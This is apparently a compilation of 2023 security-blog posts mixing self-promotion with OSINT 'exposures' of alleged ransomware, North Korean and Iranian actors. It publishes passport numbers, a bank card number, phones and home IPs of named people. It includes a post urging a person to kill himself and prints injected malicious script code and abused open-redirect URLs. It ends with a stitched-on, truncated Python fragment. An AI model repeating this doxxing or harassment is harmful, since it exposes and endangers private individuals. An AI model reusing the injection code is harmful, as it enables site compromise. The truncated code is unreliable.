2023 
2023 - 10 
Upcoming "The Hacker Scene - 1983 - 2023" E-Book - 2023-10-03 02:17 


by Dancho Danchev 
Email: dancho.danchev@hush.com 
https://ddanchev.blogspot.com


"The single most in-depth and personal account of the hacker scene from the years of the COCOM
embargo and the hacker scene up to the present day modern cyber security industry from the one and
only Dancho Danchev"


- Presented at the GCHQ with the Honeynet Project
- SCMagazine Who to Follow on Twitter for 2011
- Participated in a Top Secret GCHQ Program called "Lovely Horse"
- Identified a major victim of the SolarWinds Attack - PaloAltoNetworks
- Found malware on the Web Site of Flashpoint
- Tracked monitored and profiled the Koobface Botnet and exposed one botnet operator
- Made it to Slashdot two times
- My Personal Blog got 5.6M Page Views Since December, 2005
- My old Twitter Account got 11,000 followers
- I had an average of 7,000 RSS readers on my blog
- I have my own vinyl "Blue Sabbath Black Cheer / Griefer - We Hate You / Dancho Danchev Suck My Dick" made by a Canadian artist
- Currently running Astalavista.box.sk
- I gave an interview to DW on the Koobface Botnet
- I gave an interview to NYTimes on the Koobface botnet
- I gave an interview to Russian OSINT
- Listed as a major competitor by Jeffrey Carr's Taia Global
- Presented at the GCHQ
- Presented at Interpol
- Presented at InfoSec
- Presented at CyberCamp
- Presented at RSA Europe


Dear blog readers, 


I'm working on a new book. It's called "The Hacker Scene - 1983 - 2023" where I aim to
dazzle you as always and as usual with all the juicy technical details that you're
supposedly used to by now and will hopefully continue to be.

I intend to release this throughout the Christmas season online for free on my
Archive.org account.
Thank you. 


The Most Innovative Leader in Cyber Security To Watch in 2023 Magazine 
Edition - 2023-10-03 02:17 


Dear blog readers, 
Here's the original article including the PDF here. 
Thank you. 




My First Twitter Space on How I Tracked Down The Conti Ransomware Gang 
Using Real-Time OSINT - 2023-10-03 02:17 


[Twitter Space recording: "How I Tracked Down the Conti Ransomware Gang Using Real-Time OSINT?", host Dancho Danchev, 64 tuned in, Sep 29, 25:13]


Dear blog readers, 
Listen here. 


Enjoy. 


Me Participating in a Comparative Air Force Research Laboratory Information 
Directorate Technical Report on Botnets and Malware Detection - 2023-10-03 
02:17 


Table 10: Anecdotal cases of malicious domain names detected by Notos and the
corresponding days that appeared in the public BLs. [1]: hosts-file.net, [2]:
malwareurl.com, [3]: siteadvisor.com, [4]: virustotal.com, [5]: ddanchev.blogspot.com, [6]:
malwaredomainlist.com.




Just came across this. 


Outstanding. 


Who Can Assist With My Wikipedia Article Draft Submission? - 2023-10-03 02:17


Dear blog readers, 
Who can assist with my Wikipedia Article Draft submission here? Thanks. Much appreciated.


Draft:Dancho Danchev
From Wikipedia, the free encyclopedia


Dancho Danchev (Данчо Данчев) (born November 22 1983) in Sofia is a cybersecurity researcher
journalist and a blogger based in Bulgaria. He lives in Troyan.


Early Life

Dancho Danchev has been an active security blogger since 2007. He is a cybersecurity researcher and a
WhoisXML API threat researcher. He runs one of the security industry's most popular security
publications with over 5.6M page views, Dancho Danchev's Blog - Mind Streams of Information Security
Knowledge. He is known for reporting first on the Chinese hacktivist attack on CNN.com in 2008, the
"Operation Ababil" attack on Wells Fargo, U.S. Bank and PNC Bank and the New York Times advertisement
attack in 2009.

He has been associated with ZDNet's Zero Day blog, where he co-wrote articles and analyses on East
European criminal activity and online scams. Danchev's research often focused on cyber terrorism
activities of terrorist groups and monitoring the activities of the Koobface worm which targeted users of
social networking sites, including Facebook.

Danchev went missing in 2012, according to reports, after his blog post on the collection of his research
on terrorist organisations' use of the internet for jihad.


Education

Dancho have studied in Vasil Levski Secondary School in Troyan Bulgaria and later on studied at
Hogeschool Zuyd in Sittard The Netherlands and then at Hogeschool INHolland in Rotterdam The
Netherlands. He holds a TOEFL certificate.


Events

- Dancho is known to have presented at the Netherlands Intelligence Studies Association (NISA)
- Dancho is known to have presented the Keynote presentation at CyberCamp 2016 event in Spain
- Dancho is known to have presented at Cybersecurity Talks Bulgaria

Dancho is known to have been running Astalavista Security Group's Astalavista.com in 2003 Web site
and Astalavista.box.sk Web site in 2022.


Interviews

- Dancho gave an interview to Deutsche Welle on the Koobface botnet
- Dancho gave an interview to Linuxsecurity.com
- Dancho participated in a WhoisXML API Podcast
- Dancho gave an interview to Russian OSINT


Disappearance

In September 2010, Danchev went missing under mysterious circumstances amid concerns about his
safety. Prior to his disappearance, he had expressed concerns about surveillance by Bulgarian law
enforcement and intelligence services. Despite efforts to contact him through various means, including
phone and email, he could not be reached. ZDNet published a letter and photos he had sent, seeking
information on his whereabouts. While anonymous sources indicated he was alive but facing difficulties,
the exact details of his disappearance remain unknown.


Major Achievements

- Dancho is known to have participated in a Top Secret GCHQ Program to monitor hackers online based
  on a document part of Edward Snowden's archive
- Dancho is known to have discovered that PaloAlto Networks is part of the SolarWinds supply chain
  malicious software attack
- Dancho is known to have discovered that the Web site of Flashpoint has been compromised and was
  redirecting to malware
- Dancho is also known to have contributed to research involving the Avalanche and the Mumba
  botnets
- Dancho is known to have heavily contributed to various scareware related research
- Dancho is known to have contributed to the use of search engines by cybercriminals in the context of
  blackhat SEO (search engine optimization) and malicious search engine results poisoning research
- Dancho is known to have contributed research on the Lithuanian cyber attacks and the Russia vs
  Georgia cyber attacks
- Dancho is known to have been running and maintaining the "Diverse Portfolio of Fake Security
  Software" blog posts on scareware blog posts series
- Dancho Danchev has been quoted on India's CAPTCHA solving economy
- Dancho is known to lead the threat intelligence market segment according to a comparative market
  study


Awards

- Dancho won a Jessy M. Neal Award for Best Blog for ZDNet's Zero Day Blog in 2010
- Dancho also won a SCMagazine Social Media Award for "Five to Follow on Twitter" in 2011


Book Citations

- Dancho has been cited in Cyber Security Essentials
- Dancho has been cited in Security Awareness: Applying Practical Security in Your World
- Dancho has been cited in CompTIA Security+ Guide to Network Security Fundamentals
- Dancho has been cited in Security+ Guide to Network Security Fundamentals

Exposing Bentley and Liam From The Conti/Trickbot Malware Gang - 2023-10-07 02:24


Member of the hacker group "TRICKBOT" 
(also known as the Wizard Spiders) 
"Ryuk", "Maze", "Conti", "Diavol") 


Account (nickname): liam 


Citizen of the Russian Federation 
Name: KORNEYEV ROMAN VIKTOROVYCH 
Date of birth: September 6, 1995 


A resident of St. Petersburg, Leningrad region of the 
Russian Federation. 

Driver's license: Ne 9906 549881 dated 16.05.2019 
Bank card: 427655005681 1014 Sberbank (RF) 


Mobile phone number: +79 117265801 

Telegram: 

Username: @romakorneev (Telegram-ID: 203978435) 
Skype: romankorneev2387 


E-mail address: krvthecreator@gmail.com 
E-mail: roman95(@gmail.com 
E-mail: romka95@mail.ru 


Jabber: liam@q3meco3Sauwestmt.onion 
Jabber: LiamNeeson@jabber.ru 
Jabber: liamliam@xmpp. jp 


Home IP addresses: 
188.243.183.226 
188.243.199.19 


Social networks: 

- https://www.facebook.com/profile php? id=100003668932901 
https://www.youtube.com/channel/UCUH8mm WenoKpm3pCQzOPB1w?view_as=s 
ubscriber, 

- https://www.youtube.com/wwwroman95 

- https://vk.com/id2 3893726 


An image is worth a thousand video. A video (hxxp://youtube.com/watch? 
v=QwXs_GvsF7M) is worth less. 


Sample photos include: 

Member of the hacker group "TRICKBOT"
(also known as the Wizard Spiders) 
"Ryuk", "Maze", "Conti", "Diavol") 


Account (nicknames): bentley / manuel / Max17 / volhvb 


Citizen of the Russian Federation 
Name: Galochkin Maxim Sergeevich 
Date of birth: May 19, 1982 


Identification number: 190119506002 

} Passport of a citizen of the Russian Federation: 
9511766005 dated 08.06.1999 

Registration address: Russian Federation, 
Khakassia, Abakan, st. Kirov, building 80, apt. 1 


Mobile phone number: +79 134448958 


Telegram: 

Name: Max The Tester 
Username: @volhvb, 
Telegram id: 32910255 


Jabber: bentley@q3mcco3 Sauwestmt.onion 
Jabber: benalien@xmpp.jp 
Jabber: volhvb@exploit.im 


Social networks: 

- https://twitter.com/volhvb 

- https://facebook.com/1505024528 
- https://vk.com/id520 1387 

- https://volhvb. livejournal.com 


Also check out the following (hxxp://youtube.com/watch?v=eqBJVa89rxXE). 


Sample photos include: 

Stay tuned!


Yavor Kolev - Part Four - 2023-10-13 19:34 


Dear, 


Don't tell me you got money to buy clothes? Is this a suit? Go grab some decent clothes 
first to begin with then go home and kill yourself. But do it loudly in the toilet but before 
that take a big "your work stuff" so that when we come to visit you we can take a photo 
of you in all of your glory the "your work stuff" part. 


Enjoy! 


Interrupting the Program to Showcase the BG Dishipts that Kidnapped Me! - 
2023-10-16 20:13 


An image is worth a thousand words. Law Enforcement is also. These are the dipshits 
that kidnapped me. Period. 




Exposing North Korea's IT Worker's Eden Programming Solutions WMD-Funding IT Services and Solutions Franchise - An Overview - 2023-10-22 20:24


Jessus. This just in and I think I "did it" and I might even apply for the Rewards for
Justice program second time in a row this time believe it or not on North Korea's WMD
program in terms of tracking down North Korean IT workers that appear to have
launched massive domain farms and are actively recruiting in the field of developers
and IT workers to build mobile applications and web sites where the amount at least
according to the U.S Government goes to fund their WMD program.

In this analysis which I did in less than two hours time I'll expose the entire domain
portfolio of North Korea's IT workers that are busy franchising across the globe
potentially funding North Korea's WMD program at least according to the U.S
Government and will offer in-depth peek inside their Internet-connected infrastructure.


THIS DOMAIN HAS BEEN SEIZED 


This domain has been seized by the Federal Bureau of Investigation in accordance
with a seizure warrant issued by the United States District Court for the Eastern District of
Missouri as part of a law enforcement action against North Korean Information Technology
(IT) Workers who used it as a software development and portfolio website to advertise and
obtain remote IT freelancer jobs using fraudulent identities.


For additional information on North Korea’s use of remote IT workers 
and how to identify them see the following advisories: 


1) Guidance on the DPRK Information Technology Workers — Treasury.gov 


— Enter “North Korean IT Workers Advisory” into any search engine — 


2) Additional Guidance on DPRK IT Workers — PSA at IC3.gov 


>> Report suspicious IT workers to IC3.gov << 


hxxp://edenprogram.com 
eden201621@gmail.com 
eden.company123@gmail.com 
Team 

Alex Banks 

Anastasiia Belenok 

Isaac Hunter 

James Baker 

Mark Rober 

Mason Church 

Tony Stewart 

Alex Banks - alexbgit80k
Anastasiia Belenok - anastas-bel
Chris B - chris-bgit
Eden - Eden2016
Isaac Hunter - ishunter216
James Baker - jbaker-git
Mark Rober - mark-rober21
Mason Church - mchurch21
Tony Stewart - tonyS2013

Michael King - Lead Developer
Nick Abbate - Lead iOS & Android Developer
Tony Stewart - Full stack Mobile Developer
Claude Roberson - Full stack web developer
Tony Freeman - ASP.NET & CF Expert
Dmitriy Anisimov - Senior mobile developer
Samuel Agrebi - Senior mobile & web developer
Ricardo Salazar - Senior UI/UX Designer
David Nash - Cryptocurrency developer
Pedro Ortega - Blockchain Expert
Stanislav Cherneha


[Screenshot of a Russian-language social network post, 27 May 2022 at 7:30 pm, from an "Information Systems & Programming" college community, part of its series on graduates of the specialty. The post profiles a 2019 graduate of the Information Systems specialty at a Nizhny Novgorod college of economics and technology who lives in Nizhny Novgorod, studies Software Engineering by correspondence at the Nizhny Novgorod State University of Architecture and Civil Engineering, and continues to work remotely as a programmer, outsourcing for several companies:

- The Ready Games (https://ready.gq/);
- Ready Maker;
- Eden Programming Solutions (https://edenprogram.com), where the company acts as an intermediary and the projects are under NDA;
- A-Games (https://a-games.fun/), the most recent one, on games for mobile platforms.

Programming languages used at work: mainly C# and Java for writing plugins for Android, Objective-C for plugins on iOS, and Rust.]


hxxp://github.com/Eden-programming 
hxxp://github.com/tonyS2013 
hxxp://github.com/mchurch21 
hxxp://github.com/mark-rober21 
hxxp://github.com/jbaker-git 
hxxp://github.com/ishunter216 
hxxp://github.com/Eden2016 
hxxp://github.com/chris-bgit 
hxxp://github.com/anastas-bel 
hxxp://github.com/alexbgit80k 
hxxp://dribbble.com/eden_software 
hxxp://www.guru.com/freelancers/eden-programming-solutions 
Team 

Michael King 

Nick Abbate 

Tony Stewart 


Claude Roberson 

Tony Freeman 

Dmitriy Anisimov 

Samuel Agrebi 

Ricardo Salazar 

David Nash 

Pedro Ortega 

Stanislav Cherneha 
hxxp://www.linkedin.com/in/michael-moore-682a51189 
Sample photos include: 


EDEN PROGRAMMING SOLUTIONS 
we build everything 


Related domains known to have been involved in the campaign include: 
Related personally identifiable email address accounts known to have been 
involved in the campaign include: 
Stay tuned! 

Where Is Anton Nikolaevich Korotchenko (Антон Николаевич Коротченко) Also Known as Koobface Botnet Master KrotReal? - Part Two - 2023-11-09 01:07


Facebook's Continued Fight Against Koobface 
by Facebook Security on Tuesday, January 17, 2012 at 9:09am 


It has almost been 3 year since we gave you our last update on the Koobface virus. After 
more than 3 years and numerous hours of working closely with industry leaders, the security 
community, and law enforcement, we are pleased to announce that Facebook has been free of 
infections for over 9 months.


Today, Koobface is still impacting other web properties and continues to threaten security for
Internet users across the globe. While we have been able to keep Koobface off Facebook, we
won't declare victory against the virus until its authors are brought to justice. We feel it is the
interest of everyone online to work with law enforcement and the larger security community to
identify the gang and see the full force of law brought to bear against those who have made
millions in ill-gotten gains. To this end, we will be sharing our intelligence with the rest of the
online security community in the coming weeks in an effort to rid the Web of this virus forever.


To uphold our commitment to our users and the security of their data, Facebook takes a very
aggressive approach against security threats ranging from the most annoying social spam to
malicious viruses and malware. We have been awarded the largest damages ever under the
CAN-SPAM Act, and we work with the authorities every single day to identify and prosecute
wrongdoers. While we work diligently on removing these threats from the site, our Security
Team is only truly satisfied when we can remove these threats from the Web entirely. As part
of this continued fight against malware and cybercriminals, we wanted to give you an update
on the Koobface virus.


When Koobface first surfaced in 2008, our team worked non-stop until we were able to detect
the virus, remediate affected users, and eventually identify those parties responsible; we have
been tracking them ever since. We will be sharing this investigation material, as well as
information on how to best defend against the virus, with the larger security community. This
will better enable sites still targeted by Koobface to more adequately protect their users.


Koobface was able to generate profit through pay-per-click and traffic referral schemes. After
installing malware on a user's device, the Koobface gang was able to redirect the user's traffic
and, in some cases, trick the user into paying for fake antivirus software. Koobface was able to
perform these actions by communicating with a central "Command & Control" server, which
directed the compromised computers to do the gang's bidding. While we were able to stem the
spread of the virus using a variety of tools (including our URL blacklist and Scan-And-Repair)
the "Mothership" was left untouched.


This remained the case until last March, when Facebook Security was able to perform a
technical takedown of this "Command & Control" Mothership. And since then we have
had no new sightings of Koobface for over nine months and our teams are working hard to
keep it that way.


In addition to our work behind the scenes, we have built a number of tools that have made our
security protections some of the best on the Web and have spearheaded numerous user
education campaigns to make sure that everyone knows how to best protect themselves
online. A particular success is the Scan-And-Repair tool we built with McAfee to help our users
keep their devices malware-free. Also of note is our URL blacklist system - a core component
of the Facebook Immune system. This URL blacklist not only protects users from malicious
URLs that Facebook discovers, but also protects people from known-bad URLs from all of our
external partners.


Nothing is more important to us than ensuring the security and safety of our users and their
data. Thankfully, we aren't in this fight alone; cybersecurity is a shared responsibility for law
enforcement, industry and everyone who uses the Internet. We will continue to work with the
broad security community and industry leaders, such as McAfee and Microsoft. We will stay
firmly committed to our work with law enforcement in stopping these threats and bringing the
bad guys to justice. Cybercrime involves and impacts real people, and we praise those in the
security community for coming together to expose those who have broken the law. We are
confident that our work in identifying those responsible will put a significant dent in their ability
to harm those online and lead to a safer internet for all.


To find out more about Koobface please see the latest New York Times article or visit the 
Facebook Security Page. 


Jessus. Just came across this and I decided to elaborate. It's 2012 and no one is fighting
Koobface. It's just me doing research with success at the time.

If an image is worth a thousand words then check out some of the most recent publicly
accessible photos of Anton Nikolaevich Korotchenko also known as Koobface botnet
master KrotReal including some sample maps of his latest visits across the globe
including possibly the fact that he's visited the United States which is quite a news
taking into consideration his online activities counting the total number of cities that he
has visited internationally up to 65.

Stay tuned!


The Conti Ransomware Gang - 2023-11-14 19:37 

An image is worth a thousand words. Video and related images courtesy of the Conti
Ransomware Gang is worth more. Go through my original research here and my Conti
Ransomware Gang compilation here.


Sample photos: 

Stay tuned!


The Conti Ransomware Gang - Videos - Part Two - 2023-11-16 19:53 


An image is worth a thousand words. Videos courtesy of the Conti Ransomware gang are
worth more. Check out the following including my Conti Ransomware Gang research
compilation here.


Sample videos: 


Stay tuned! 


Interrupting the Program to Showcase the BG Dishipts that Kidnapped Me! - 
Part Two - 2023-11-24 04:49 

An image is worth a thousand words.
Sample photos: 


BS 


MIHAEL GRYUN 


Sample Facebook accounts: 
https://www.facebook.com/profile.php?id=100005932519460 - NaBnanH Teoprues 
https://www.facebook.com/profile.php?id=100030506870037 - Bacun FayescKku 
Stay tuned! 

An image is worth a thousand words.

Key Features


Thanks to an individual approach to each client when you work with our system 
you have 

- Online statistics updated in real time 

- A 24-hour support service ready to answer all your questions 

- Absolutely no shaving and total independence of your statistics from other 
system users 

- Stable weekly payments on virtually all payment systems: Fethard, WebMoney 
Wire, e-gold, Western Union (WU). MoneyGram, Anelik and ePassporte, and 
PayPal 


- For regular clients and for those making more than 5000 installs per day - higher
rates for all countries and special working conditions

We have more than 8 years’ experience in working with installs. Our regular clients 
include more than 1000 webmasters who are all pleased to work with us 

An image is worth a thousand words.

Loader botnet. Working: Windows XP SP 1/2/3, Windows Vista. Bots is testing loads 20k mixed traffic - bots connect to admin ~21k
(~92%).

An image is worth a thousand words.


China vs Iran Hacktivism Campaign - 2023-11-24 12:14


An image is worth a thousand words. 

[Screenshots: browser views of the Carder.Su ("All About Security in Network") vBulletin forum, including "vBulletin Message" notices, the Admin Control Panel (vBulletin 3.8) and the thread "SPASIBO" (http://carder.su/showthread.php?t=35071) in the "Flood, flame, lol" section]

Mod Bot v1.1 Malicious Software - 2023-11-24 12:14 


An image is worth a thousand words. 


[Screenshots: the Carder.Su forum index (threads advertising CVV2, dumps and shipping-label services) followed by the Mod Bot control panel with its Bots, Mods and Config tabs, a LOADER section (Load File, Count, Delete File, New File), a BOT STAT view (all / online / online % per country), the loader, spam2 and framer modules, and an email header macro editor.]



An image is worth a thousand words. 


[Screenshots: the QuadNX Command Center (settings pointing at localhost and getcmd.php, a command list that includes ddos, flood types and shutdown, a "Botnet Detailed Statistics" tab and C&C logs) and the Hybrid Remote Administration Control System (tabs: Terminal, Statistics and Control Panel, Hybrid Generator, Dictionary Files, FTP Cracking Progress; generator fields for base bot name, directory, default sleep time, getcmd.php and User Agent "Hybrid_v.1.0"; an "Encrypted Remote Terminal Emulator").]



Rogue Google AdSense Campaign - 2023-11-24 12:15 


An image is worth a thousand words. 


[Screenshots: Dutch-language Google results for "download winamp free", with sponsored links that include winamp.winamp-co.com next to the genuine www.winamp.com results, and a table of related look-alike "-co.com" domains.]



SQL Injection Attack Campaign - 2023-11-24 12:15 


An image is worth a thousand words. 


[Screenshot: Google results for ASP pages whose titles and snippets contain the injected tag <script src=http://yrwap.cn/h.js>, among them pages on www.beanonline.org, www.decentx.com and www.tracksat.com, several flagged "This site may harm your computer."]



Managed Spam Service - 2023-11-24 12:15 


An image is worth a thousand words. 


[Screenshot: Russian-language advertisement for a managed email spam service. It offers mailings to databases of legal entities and individuals priced in rubles, filter-bypassing software, daily collection of fresh email addresses, randomized subjects, links and sender addresses, scheduled start times, and states that a mailing of 1 million messages takes about 2 hours.]



EyeWonder iFrame Injection Attack Campaign - 2023-11-24 12:15 


An image is worth a thousand words. 


<base href="http://www.eyewonder.com/" /><meta http-equiv="content-type" content="text/html; charset=utf-8"

<!-- Post Click Tracking Location: EyeWonder HomePage EyeWonder HomePage -->
<script type="text/javascript">
<!--
var dd = new Date();
var ord = Math.round(Math.abs(Math.sin(dd.getTime())) * 1000000000) + 10000000;
var fd_pet_src = new String("<scr"+"ipt src=\"http://adsfac.us/pet_mx.asp?L=235288&source=js&ord="+ord+"\" t
document.write(fd_pet_src);
-->
</script>

<noscript> 


oO" width="0" height="0" x ; et , 4 if"></iframe> 


</noscript> 

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-trans
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<!-- <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> -->
<TITLE>EyeWonder :: Interactive Digital Advertising, Rich Media Ads, Video Ads, Flash Ads, Online Advertisin
<meta name="keywords" content="eye wonder, eyewonder, eye-wonder, iwonder, rich, media, richmedia, rich medi
<meta name="description" content="EyeWonder is Interactive Digital Advertising's fastest-growing innovator,
<META NAME="PUBLISHER" CONTENT="EyeWonder Inc.">
<META NAME="COPYRIGHT" CONTENT="Copyright 2008 by EyeWonder Inc.">
<META NAME="REVISIT-AFTER" CONTENT="7 days">
<META NAME="author" CONTENT="EyeWonder Inc.">
<META NAME="ROBOTS" CONTENT="ALL">
<link href="index.css" rel="stylesheet" type="text/css" />
<script language="javascript">AC_FL_RunContent = 0;</script>
<script src="AC_RunActiveContent.js" language="javascript"></script>
</head>

[Screenshot: statistics panel ("Welcome, root") with Browsers, Systems, Country and Referers tabs. The Country view lists, per country, a count, its percentage, loads, efficiency and total efficiency; the Russian Federation, Romania, "Unknown", Spain and Ukraine head the list.]

An image is worth a thousand words.

[Screenshots: sitemap listings of keyword-named .html pages (news, sports and celebrity search terms) hosted on newsa09.is-the-boss.com and cnnnews09.is-the-boss.com.]

An image is worth a thousand words.

[Screenshot: list of host names, among them dw.com.com, i.i.com.com and pn2.adserver.yahoo.com.]

An image is worth a thousand words.

[Screenshot: cPanel server administration session logged in as root, showing the Security, Server Contacts, Resellers and Service Configuration menus and the "Show Reseller Accounts" view (Total: 695 accounts) with user, domain and package columns.]

An image is worth a thousand words.

[Screenshots: "Server is too busy, please try again later..." error responses, and a set of "PAGE REBOOT" frames repeatedly refreshing several Web sites, www.irib.ir among them.]

Dancho Danchev’s Videos - 2023-11-27 20:26


Dear blog readers,
Find below some videos courtesy of me and stay tuned for more.


[Video thumbnails: "Dancho Danchev Speaks! The World's Most Popular and Often Cited Security Blog"; "Live Cyber Threat Map"; "Ghost Security - GhostSec Team Members"; each carrying the author's contact card.]


Stay tuned!
Email Address Accounts Known To Belong To Owners of E-Shops for Stolen
Credit Card Details - 2023-12-01 14:14


[Screenshot: search interface of an E-shop for stolen credit card data, with filters for BINs, last four digits, country, bank, code, level, credit/debit, type and base ("Cards found: 840"), and result rows showing expiry dates, "UNITED STATES OF AMERICA", credit union names, "CLASSIC" and "TR2 ONLY".]




The following are personally identifiable email address accounts including domains 
known to belong to owners of E-Shops for stolen credit card data. 


Sample domains involved include: 


Sample email address accounts involved include: 
Stay tuned! 


Iran's Afkar System Yazd Co Ransomware - 2023-12-01 14:15 


The following are all the ransomware-themed domains known to have been
associated with Iran's Afkar System Yazd Co ransomware.


Sample domains known to have been involved in the campaign include: 

Sample email address accounts known to have been involved in the campaign 
include: 

amirbitminer[.]gmail.com 

thund3rz[.]protonmail.com 


Email Address Accounts Known To Belong To Owners of E-Shops for Stolen 
Credit Card Details - Part Two - 2023-12-01 14:15 
The following are personally identifiable email address accounts including domains
known to belong to owners of E-Shops for stolen credit card data. 


Sample email address accounts include: 
Stay tuned! 


Cybercrime-Friendly Forum Communities - Part Two - 2023-12-01 14:16 


[Image: "Cybercrime Forum Data Set 2021" banner: "Full offline copies of over 111 publicly accessible cybercrime friendly forum communities! Let's set them straight!"]


The following is a compilation of currently active cybercrime-friendly forum 
communities. 


Cybercrime-friendly forum communities include: 


Rewards for Justice - Dancho Danchev - 2023-12-01 14:16 


The following are domains and personally identifiable information on a bulletproof 
hosting provider mentioned by the Conti Ransomware gang. 
hxxp://school-global.ru 

hxxp://youladance.ru 

Phone: +373 775 96666

E-mail: info@morene[.]host 

Skype: morene[.]host 

Jabber: morene@jabber[.]morene[.]host 

ICQ: 700812649 / 702647156 

Telegram: @hostmorene 

Viber: +373 775 96666 

WhatsApp: +373 775 96666 

Online chat: https://morene[.]host


Full Names of Ashiyane Digital Security Team Members - 2023-12-01 14:16 


The following compilation is a set of full names of Ashiyane Digital Security Team 
Members. 


The following are the full names of Ashiyane Digital Security Team Members: 
Keyvan Sedaghati — keivan 

Ramin Baz Ghandi — frOnk 

Erfan Zadpoor — PrinceofHacking 

Hamid Norouzi — eychenz 

Poorya Mohammadrezaei — Hijacker 
Omid Norouzi — Sha2ow 

Milad Bokharaei — ®Maste 

Vahid Maani — WAHID 2 

Kaveh Jasri — root3r 

Ali Hayati — Zend 

Milad Mazaheri — mmilad200 
Mohammad Reza — iNJECTOR 
Mohammad Mohammadi — Classic 

Nima Salehi — Q7X 

Milad Jafari — Milad-Bushehr 

Shahin Salak Tootonchi — ruiner_blackhat 
Amin Bandali — anti206 

Mohammad Hadi Nasiri — unique2world 
Mahdi Chinichi — Virangar 

Amir Hossein Tahmasebi — __amir__ 
Ashkan Hosseini — Askn 

Mohammad Tajik — taghva 

Meghdad Mohammadi — M3QD4D 

Sina Ahmadi Neshat — Encoder 

Behrouz Kamalian — Behrouz_ice) 
Farshid Sargheini — Azazel 

Armin — n3me3iz 

Mahdi K. — r3d.zOnE 

Iman Honarvar — iman_taktaz 

Ali Seid Nejad — Ali_Eagle 

Mohammad Reza Ali Babaei — mzhacker 
Navid Naghdi — elvator 

Mohammad Reza Dolati — HIDDEN-HUNTER 
Mehrab Akherati — AliAkh 

Amin Javid — Gladiator 


Cybercrime-Friendly Forum Communities - 2023-12-01 14:16 


The following is a recently obtained compilation of currently active cybercrime-friendly 
forum communities. 


Sample cybercrime-friendly forum communities include: 


Emennet Pasargad - 2023-12-02 13:18 
The following are domains and personally identifiable email address accounts belonging
to Iran's Emennet Pasargad also known as Eeleyanet Gostar and Eeleyanet Gostar. 
Sample domains: 

eeleyanet.com 

eeleyanet.ir 

Sample personally identifiable email address accounts: 
sidafin@mihanmail.ir 

amirhaghighi2014@yahoo.com 

safary.mansoor@gmail.com 

Rahimi@Live.com 

faranakbehjati@yahoo.com 

h.boloukat@gmail.com 


The Conti Ransomware Gang's OSINT Artifacts - 2023-12-02 16:58 


The following is a set of OSINT artifacts courtesy of the Conti Ransomware gang. 


hxxp://cc2-btc.cc 

hxxp://dyncheck.com 

hxxp://luxchecker.pw 

hxxp://major.ms 

hxxp://securecall.club 

hxxp://securecall.top 

hxxp://checkzilla.io 

Including the following two XMPP/Jabber accounts: 
mcduckgroup@exploit.im 

uvoice@xmpp.jp 


The Most Innovative Cyber Security Leader to Watch in 2023 - 2023-12-15 
19:01 


Dear blog readers, 


I did it. Check out the article here.


Related photos: 
[Photo: certificate awarded by CIOLook in recognition as one of "The Most Innovative Cyber Security Leaders to Watch in 2023", for empowering excellence through innovative solutions and driving transformations in the niche.]
Looking for a Research Sponsorship - 2023-12-15 19:02


Dear blog readers, 


Are you interested in sponsoring my research on my way to grab a new laptop for the 
holidays? 


Drop me a line at dancho.danchev@hush.com to discuss and I'll do my best to deliver 
the results that we agree upon. 


Offering my Laptop for Memorabilia Purposes - 2023-12-15 19:02 


Dear blog readers, 


Who wants to acquire and purchase my laptop 2015-2023 for memorabilia purposes and
possibly somehow use it, preserve it or display it somewhere?


Related photo: 


[Photo with overlay text: "by Dancho Danchev", the blog URL and the email address.]


Drop me a line at dancho.danchev@hush.com 


Upcoming Webinar Participation - 2023-12-15 19:02 


[Webinar poster: Université Paris 1 Panthéon-Sorbonne / XRATOR, "Conquer Your Risk"] 

The evolving threat landscape and the future of cybercrime. 

Monday, 12 December 2023, 18:30 (Paris) 

Speaker: Dancho Danchev, Threat Intelligence Pioneer, Nation-state cybercrime researcher 

Hosted by: the Co-Director of the Risk Chair and Ronan Mouchoux (Threat Intelligence Specialist, Cofounder of XRATOR) 


Dear blog readers, 


Check out the link here. 


Who's Pushing All The "Fake Updates" Malicious Software Using Redirectors and Traffic Distribution and Redirection Systems and Tools Domains? - 2023-12-28 13:03 


[Screenshot: a "Redirect Warning" interstitial reading "You're opening a new web page going to host anp1swZv.biggerfun.org that is not part of NPC. Please double check that the address is correct", showing http//anp1swZv.biggerfun.org/anp1swZv/ with Continue and Cancel options] 


I've recently observed an increase in compromised, or to be precise exploited, 
high-traffic and high-profile Web sites, in the context of abusing unfixed web 
application flaws such as redirection notifications. The ultimate goal is to push 
rogue traffic distribution and traffic management domains that are part of a URL 
redirection chain, which utilizes both legitimate high-traffic and high-profile Web 
sites and purely malicious Web sites for the purpose of dropping malicious software 
on the targeted hosts. 

The surprising part? The primary and entire portfolio of these traffic redirection and 
traffic management domains is parked on 193.106.175.18 - AS50465 - IQHost Ltd, where 
one of the bigger domain farms is parked at hxxp://biggerfun.org. 


[Figure: graph with nodes fonts.googleapis.com, fonts.gstatic.com, machinetext.org, surelytheme.org, freethegirlinitiative.org, bluegaslamp.org, draggedline.org, throatpills.org and climedballon.org] 


Sample misconfigured high-traffic and high-profile Web sites that allow 
redirections potentially bypassing reputation filters include: 


hxxp://afmonline.org/?URL=hxxp://khTrnBOWV8.biggerfun.org/khTrnBOWV8/ 
hxxp://whiskyparts.co/?URL=m88Z2iiER.biggerfun.org/mM88Z2iiER/ 
hxxp://hardemancounty.org/?URL=http%3A%2F%2F1FXddDHkYN.biggerfun.org/1FXddDHkYN/ 
hxxp://bukkit.org/proxy.php?link=hxxp://uToqSuwC.biggerfun.org/uToqSuwC/ 
hxxp://www.centralsynagogue.org/?URL=hxxp://NjNr8Mkm.biggerfun.org/NjNr8Mkm/ 
hxxp://board-en.piratestorm.com/proxy.php?link=http%3A%2F%2Fnpn8KwBr.biggerfun.org/npn8KwBr/ 
hxxp://boards.theforce.net/proxy.php?link=hxxp://WihYqBBuvj.biggerfun.org/WihYqBBuvj/ 
hxxp://www.cutrite.com.au/?URL=hxxp://9MVRIHjF.biggerfun.org/9MVRIHjF/ 
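
A triage sketch for the redirect abuse shown in the sample URLs above, added here as an example and not the author's own tooling: it flags proxy-log URLs whose `URL=` or `link=` parameter points off-site, and marks targets that repeat their leftmost host label as the first path segment. The function names, the `.example` hosts and the tokens in `SAMPLE_URLS` are constructed; only biggerfun.org comes from the post.

```python
from urllib.parse import urlsplit, parse_qsl

# Parameter names that carry the redirect target in the sample URLs above.
REDIRECT_PARAMS = {"url", "link"}

def refang(url):
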